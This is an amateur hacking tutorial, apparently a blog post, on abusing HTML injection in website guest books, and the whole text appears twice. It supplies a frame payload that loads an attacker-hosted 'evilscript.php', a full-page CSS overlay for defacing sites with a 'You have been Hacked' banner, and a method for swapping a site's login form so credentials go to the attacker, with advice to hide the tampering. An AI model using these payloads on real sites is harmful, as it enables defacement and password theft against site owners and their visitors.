So you have found a guest book which allows for HTML injection, so what now, what can you do?
So we know that we can enter HTML into the page, chances are if the owner hasn't stopped you putting HTML into the page, chances are they wont have stopped you putting PHP into the page (this will only work if the website is hosted on a host which has PHP installed for the users, most hosts allow for PHP pages i believe).
But what if you can't inject PHP into the guest book
Ok so you can't inject PHP directly into the guest book, unlucky.
But its not the end of the world, lets think through HTML and think what we might be able to use here, what allows us to put things into a webpage without having the processing done on that website...
IFRAME, FRAME, EMBED, APPLET
FRAME, IFRAME
Lets think you want to get a php page on to a website which only accepts HTML, so lets give it some HTML.
Code:
<frame src="http://www.yoursite.org/evilscript.php">
Now what does this do?
What it does is it creates an area on the page (this can be defined by using the height and width parameters) which basically shows what is on the page that you have used (in this case http://www.yoursite.org/evilscript.php).
Please note, that all processing of information is done where this is hosted.
EMBED, APPLET
Now for all you clever clogs who can write stuff in things like java, flash etc. you could write something in that language which could get information for you or some other task (im not going to go into alot of detail due to not knowing java, flash or what you are able to do with these)
Please note, that all processing of information is done where this is hosted.
Ok we can put things onto the website, but you can't really do much to the website can you, you can't deface it or get passwords.
Well we can but this involves another element of HTML, STYLE.
What this does is it defines how something comes up on a page so you can write a style to make anything in the bold tages(<b>) to be font arial font-color blue, or something like that
Wow we can make the thing look nice but that doesn't help us get passwords or deface the website.
I'll start with defacing the website.
There is a couple of things that style can do which are very useful...
Z-INDEX, what this does is define what layer of the page your information is.
The default level is 0, this is the original webpage.
1 is above 0 therefore if you set something to be z-index = 1 then it will be above the information on level 0. which is the original webpage.
-1 is below 0 therefore is you set something to be z-index = -1 then it will be below the informatin on level 0, this will mean that what you put would be hidden behind the original website.
POSITION, what this does is define where on the page what you have used position on will be displayed, for this I will only go into absolute position but there is also relative position.
With this you define exactly where you want something to be placed. There are two parameters to absolute position, top and left. This is how far from the top of the browser area you want something and how far from the left of the browser area you want something.
HIEGHT and WIDTH, what this does is define what size something is.
Now lets combine all those together, what would happen if you set...
z-index to 1
position top = 0
postition left = 0
height = 100%
width = 100%
on an something
Well it would cover the entire page.
That would be very useful for defacing the website.
Here is some example code of what something like this would look like.
Code:
<style>
#elem
{
z-index: 1;
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: black;
color: red;
}
</style>
<div id=elem>
<p align=center>
<b>You have been Hacked...<br>
By Me<br></b>
</p>
</div>
But what about getting passwords
Well if you can cover their web page with your own, maybe you can take their source code put that into what has been given above, change the form which allows them to login, to send you the information instead, obviously this is very obvious, so you will have to think of ways of changing this method to make sure you dont make it obvious of what has just happened.
Practicing HTML Injection/XSS
If anyone is interested in practicing what i have been talking about here, on my website i have created an area (completely secure) which will allow you to try this on differen't levels of filtering.
Each user has their own area (which only that user can access) so there is no worries about using that and then finding someone has stolen your information.
The website is Learn2Hack.Net
You need to be a member of Learn2Hack in order to access the practice area.
You will need to go to "Practice Area's" then to "XSS" then you choose either Guest book 1 (which has a small amount of filtering) or Guest book 2 (which has more filtering).
So we know that we can enter HTML into the page, chances are if the owner hasn't stopped you putting HTML into the page, chances are they wont have stopped you putting PHP into the page (this will only work if the website is hosted on a host which has PHP installed for the users, most hosts allow for PHP pages i believe).
But what if you can't inject PHP into the guest book
Ok so you can't inject PHP directly into the guest book, unlucky.
But its not the end of the world, lets think through HTML and think what we might be able to use here, what allows us to put things into a webpage without having the processing done on that website...
IFRAME, FRAME, EMBED, APPLET
FRAME, IFRAME
Lets think you want to get a php page on to a website which only accepts HTML, so lets give it some HTML.
Code:
<frame src="http://www.yoursite.org/evilscript.php">
Now what does this do?
What it does is it creates an area on the page (this can be defined by using the height and width parameters) which basically shows what is on the page that you have used (in this case http://www.yoursite.org/evilscript.php).
Please note, that all processing of information is done where this is hosted.
EMBED, APPLET
Now for all you clever clogs who can write stuff in things like java, flash etc. you could write something in that language which could get information for you or some other task (im not going to go into alot of detail due to not knowing java, flash or what you are able to do with these)
Please note, that all processing of information is done where this is hosted.
Ok we can put things onto the website, but you can't really do much to the website can you, you can't deface it or get passwords.
Well we can but this involves another element of HTML, STYLE.
What this does is it defines how something comes up on a page so you can write a style to make anything in the bold tages(<b>) to be font arial font-color blue, or something like that
Wow we can make the thing look nice but that doesn't help us get passwords or deface the website.
I'll start with defacing the website.
There is a couple of things that style can do which are very useful...
Z-INDEX, what this does is define what layer of the page your information is.
The default level is 0, this is the original webpage.
1 is above 0 therefore if you set something to be z-index = 1 then it will be above the information on level 0. which is the original webpage.
-1 is below 0 therefore is you set something to be z-index = -1 then it will be below the informatin on level 0, this will mean that what you put would be hidden behind the original website.
POSITION, what this does is define where on the page what you have used position on will be displayed, for this I will only go into absolute position but there is also relative position.
With this you define exactly where you want something to be placed. There are two parameters to absolute position, top and left. This is how far from the top of the browser area you want something and how far from the left of the browser area you want something.
HIEGHT and WIDTH, what this does is define what size something is.
Now lets combine all those together, what would happen if you set...
z-index to 1
position top = 0
postition left = 0
height = 100%
width = 100%
on an something
Well it would cover the entire page.
That would be very useful for defacing the website.
Here is some example code of what something like this would look like.
Code:
<style>
#elem
{
z-index: 1;
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: black;
color: red;
}
</style>
<div id=elem>
<p align=center>
<b>You have been Hacked...<br>
By Me<br></b>
</p>
</div>
But what about getting passwords
Well if you can cover their web page with your own, maybe you can take their source code put that into what has been given above, change the form which allows them to login, to send you the information instead, obviously this is very obvious, so you will have to think of ways of changing this method to make sure you dont make it obvious of what has just happened.
Practicing HTML Injection/XSS
If anyone is interested in practicing what i have been talking about here, on my website i have created an area (completely secure) which will allow you to try this on differen't levels of filtering.
Each user has their own area (which only that user can access) so there is no worries about using that and then finding someone has stolen your information.
The website is Learn2Hack.Net
You need to be a member of Learn2Hack in order to access the practice area.
You will need to go to "Practice Area's" then to "XSS" then you choose either Guest book 1 (which has a small amount of filtering) or Guest book 2 (which has more filtering).
No comments:
Post a Comment